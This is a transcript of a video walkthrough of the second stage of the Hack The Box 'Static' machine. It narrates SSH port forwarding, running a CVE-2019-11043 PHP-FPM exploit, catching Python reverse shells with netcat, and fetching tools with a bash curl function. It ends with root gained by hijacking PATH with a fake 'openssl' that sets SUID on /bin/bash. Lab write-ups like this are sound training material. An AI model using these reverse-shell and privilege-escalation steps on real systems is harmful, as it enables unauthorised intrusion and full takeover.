Guys, welcome back. Hope you all are doing well. So this is the second part of static machine. We already got the user shell from last video, and we can also now connect with the PKI server. Fine. So now let's see what we can do. Because we don't have nmap in this uh, machine, so we can do few things to actually see what we can do with PKI. So if I try net state space hyphen ANO, sorry, net state space hyphen ANO, so you will find this port number 80 we actually access, but there is one more entry is there which is allow for everyone, uh, but we cannot access that from here because we cannot ping from our machine to 192.168.254.3. We cannot ping the PKI server directly. So we need to make it from here. So what we are going to do, we are going to actually, and here if we try http colon slash slash 172.20.0.10. So this is going to open the website which is published on this. But what is published on this? That is suspected. So for that, what I am going to do is clear this, and we don't need now metasploit. So I'm going to exit this, exit, exit, uh, back, and exit. Clear port forwarding with SSH. So SSH space hyphen I and IDRSA. Okay, then space hyphen capital L, port number 20, port number 80, 192.168.254.3, and port 80, www space hyphen data at 172.20.0.10, and let's hit enter. Okay, now if we try here http colon slash slash 127.0.0.1, enter, and yeah, there is something else published on that. It means uh, that one 0.0.0 colon 80 that is running on PKI server, which is 192.168.254.3. So that's good, but what is there? What is that? ERSA tool, create, print, revoke, search exploit, ERSA tool. I think I see that first time. Maybe this is the custom binary or created by um, some user, or I don't know, because I don't see this before. Um, okay, but we can see here there is a path for this. So just copy that and clear. We are still on the web server, not the PKI, so we cannot see what's exactly this. Okay, so let's go and see the page source. Nothing interesting there. Inspect elements, network, reload the page again. This is the main one. Okay, so header, request, response. Response is this, cookie, no cookie, header. So get, file name is slash, okay, server is nginx. Really? Yeah, maybe this on the PKI server nginx is running, because we cannot scan the PKI server, or we need to install the nmap on the web server. There are certain ways also you can also scan the ports with the netcat also. Uh, but the interesting part here is nginx, and if you go down, you will see X powered by PHP FPM 7.1, and that seems interesting. So search exploit and PHP FPM, and yeah, so remote code execution vulnerability is there, but we need to actually check what is going on there. So if I go there, I actually already clone the repository for that. So open, and inside this there is exploit.py, and if you go here again and if you read this, so this is the same file you will found from search exploit. So this is a POC and the CVE is 2019-11043. This is the Docker setup. You can actually recompose the whole exploit. So, okay. So I'm not interested in this, but this is the good thing for us. So this is the exploit.py file, Python file. It needs a few arguments like URL, verbose, and skip RCE. If you just want to scan the target, whether it is vulnerable or not, you can skip RCE. So once you skip RCE, it is not going to execute this part, or it is not going to call the exploit function. And if you want to exploit, so you can run as it is, just with the URL. And at the last, uh, it's actually going to give you a parameter. With that, you can run the command. It's not going to run in that way. So we can do this in another way. So we will run this file to just actually generate this parameter, and then we can use this and run our exploit with Python. That's it. Fine, but this exploit, we cannot make this exploit from our Kali machine. We must, because we cannot directly contact or directly access to the PKI server. So we must put this exploit.py in this web server, and then we can exploit that. But there are few more things we need. The first one is with exploit.py, we need one more file which we need to create. That is very easy. You can also do that. So I have already created that. Go back here, rev.py. So I created this file. It is super easy to do. You can go payload all the things or pentest monkey to get this Python reverse shell. So I just created before so that I can save the time. And one module you need is request, because at last, once you run the exploit.py file, it will create one uh, parameter for you, and with that parameter you can execute the commands. So for reverse shell, because I need reverse shell, so this payload I'm going to use after this as this parameter value. Second thing, here we need the attacker IP as the IP of web server, because the shell we will get on the web server, not on the Kali machine, right? Because Kali machine cannot contact to this target IP PKI server. Fine. And we are going to use port number 7000. So we need these two files. We need to send these two files to the web server. Another problem is that here there is no wget and there is no curl. So for that reason, uh, if you search on the Google how to download file without curl or without wget, you will get this link from the Unix Stack Exchange, and here you will find the bash script function for the wget and for the curl. So wget function is a bit long, so I'm going to use this curl function. Copy this, come here, and paste that. Hit enter. Now curl, we can call this function as this underscore underscore curl. So let's go cd slash temp ls space hyphen la xdebug dot log only there. So clear, and I'm going to here cd desktop the desktop Hackthebox static. Okay, so I have all the files here. So python 3 space hyphen m http dot server, enter on 8000. Now here you can call curl http colon slash slash, and most important part is we need to download this file from this IP, because you are connected with this web server through this IP, not other IPs. Okay, and colon 8000 and slash exploit dot py. Oh, sorry, it is gonna just show us that, and save it as exploit exploit.py. That's it. Another is rev.py and save it as rev.py. Fine. Next thing we need is netcat, because how you will get the reverse shell. So you need a listener, and we are going to use netcat. Okay. So all three files we have here now in the temp directory. Okay, so ls, and you have exploit.py and creverse.py. That's fantastic. Okay, so clear, and let's go and do our job. So in this terminal, I'm going to set up the netcat listener. So cd slash temp and chmod 755 for nc, and dot nc space hyphen nlvp, and I'm going to listen on port 7000, what we mentioned in rev.py, and here python 3 exploit.py hyphen hyphen url, and the URL is gonna be http colon slash slash 192.168.254.3. This is the IP for PKI server slash index.php. That's it. Hit enter. And once this script runs successfully, we need to run rev.py, because this script will create the parameter for you, and with that parameter you can run commands. Okay, so python 3 and rev.py, and we got the reverse shell, and who we are is PKI. So hostname is PKI. Well done. We got one shell here also. That's fine. Now we can check actually that. So ls space hyphen la slash user slash bin slash ersa tool, because ersa tool is in PKI server, and this tool is actually running as root. So this could be a way to get the root. Fine. Okay. So let's see what this tool is actually do. Copy, paste selection, and if we go back to here, you can see you can run ERSA tool and create, print, and revoke. Maybe these are the commands which we can use with that. Let's try something. Uh, okay, so these are the commands. Exit is also one command there. Let's try create 123, create 123, and what is that? So I think what OpenVPN connection file we got is generated by this tool, because you can see here whatever you write with the create, you will it is creating the OpenVPN file. That's fantastic. I want to see something else. Exit, clear, not clear, export term is equal to xterm and clear. So ps space aux, but the problem is how we run that tool again. So let's take one more shell from PKI. So horizontal, and come on, SSH space -i IDRSA cd desktop. I actually hate that HTTP static. SSH space -i IDRSA www data at 172.20.0.10. Enter. Clear, and we need to change a bit this file, because we already took one connection on 7,000. So let's take this connection on 6,000. So save this file, and this time clear. Here is curl. So yeah, and this time I'm going to save it as riv2.py. We got it. So okay, here cd/temp and nc space -nlvp and 6,000. I need to listen on it and run this again. And this time we need to run riv2. So where is it? riv2.py. Run again and again. Maybe sometime you need to run multiple times, and yeah, we got the shell. So why I take another shell is I want to run that ERSA tool, and here I want to see the process. But maybe we need PSPY, because you cannot continuously see the process, what process is running, what process just started, what process is terminated. You cannot see with this command. So why not I take the PSPY already without wasting the time. So come on. Clear that. Okay, so ls space -la, and this time we have it. So clear Python server. Yeah, come here. http://192.168.254.2:8000/pspy64 tspy64 ls space hyphen la. So clear and chmod plus x tspy64. Hit enter and tspy64 p log. So I can see everything what we are doing here. clear, clear, come down. So now these two uh, belongs to web and these two terminals belongs to PKI server. So now I'm going to start ERSA tool. So slash user slash bin slash ERSA tool. Hit enter. Once we hit enter, you can see we got the real time. Now we can see the real time processes, whatever start and terminated. So it's saying you can use these commands. So let's go and use create command and hit enter. As we hit enter, we find here something. Few other processes started. So these are the commands ran once we create the OpenVPN file. So as you can see here, once we create OpenVPN file, it is going to execute OpenSSL command, move command, sed command. These all the commands it is going to execute. So what we can do, we can actually use path manipulation attack. So right now, if we see here, exit clear and echo $path. So now you can see this is the path. So any executable or any command you want to execute from here, it is gonna first see in all these directories, call from all these directories. So if we add one path before this and we put a binary file with the same name like OpenSSL and we put malicious code in that, so it means whenever this process is going to call OpenSSL, it is going to call the attacker controlled OpenSSL file and we can run anything. So let's do this. cd root cd root. Okay, so export, and we are going to export the path equal to /temp /root and $path and echo path now. So you will find before this was the path and now this is the path, and we already added that path. So whenever it is going to call any command, it will first see that command here. Now what you need to do is here I'm going to say nano OpenSSL, and inside OpenSSL /bin /bash and chmod u plus s because if here we see ls space hyphen la /bin /bash, so you can see even now we can run the bin bash, but the problem is if that user want the bin bash command as a root, so you must set it here the SUID bit. Okay, so to set the SUID bit set, we need this and /bin /bash. Done. Okay, so cat OpenSSL Fantastic. Now we need to create this file here in this path. So we need to again copy here, copy here, copy here. So we can do one thing, that is um, cat and open SSL base64. So this is the base64 value, whatever the content inside that file. I'm going to copy this here from here and clear. Now echo and paste that value, then decode that value, base64 space -d, and whatever value, let's just check once. So you can see the decoded value is the same. So we can again, come on, take this, paste it here, and save this in open SSL file. That's it. Cat open SSL. So you can see created. Now if I try to again create OpenVPN file with ERSA tool, so our OpenSSL file is gonna called by the root. Okay, so create, enter 1 2 3 anything you want. So it's already ran, and OpenSSL command again called. So it is going to call from our directory, right? So now exit from here, clear, and again if I check ls space -a ls/bin/bash, so there should be, yes, I got the problem, because, and this should not be done because the permission is not for execution. That's why it's not executing OpenSSL file. So chmod 755 OpenSSL. Now run the ERSA tool, ERSATOL, create, and anything you want to create. Now this time it will run from the attacker controlled path, and if we go back, ls space -la/bin/bash, and as you can see now, this this SUID bit is set here. Now if you want to run /bin/bash space -p, and boom, so your root ID is root. You can see here, who am I is root. I don't need this part, exit this, clear, we can clear still, yeah. So who am I, ID, and host name. So we are PKI root, host name is this, cd/root ls space -la, and you can see root.txt. If you want python3 space -c, import pty:/pty.spawn and /bin/bash, close this, enter. We got back. So this is good. So we are root, and you can read this. That's it for this video. Thank you so much for watching. If you like the content, please like, subscribe, and share. See you in the next video. Bye.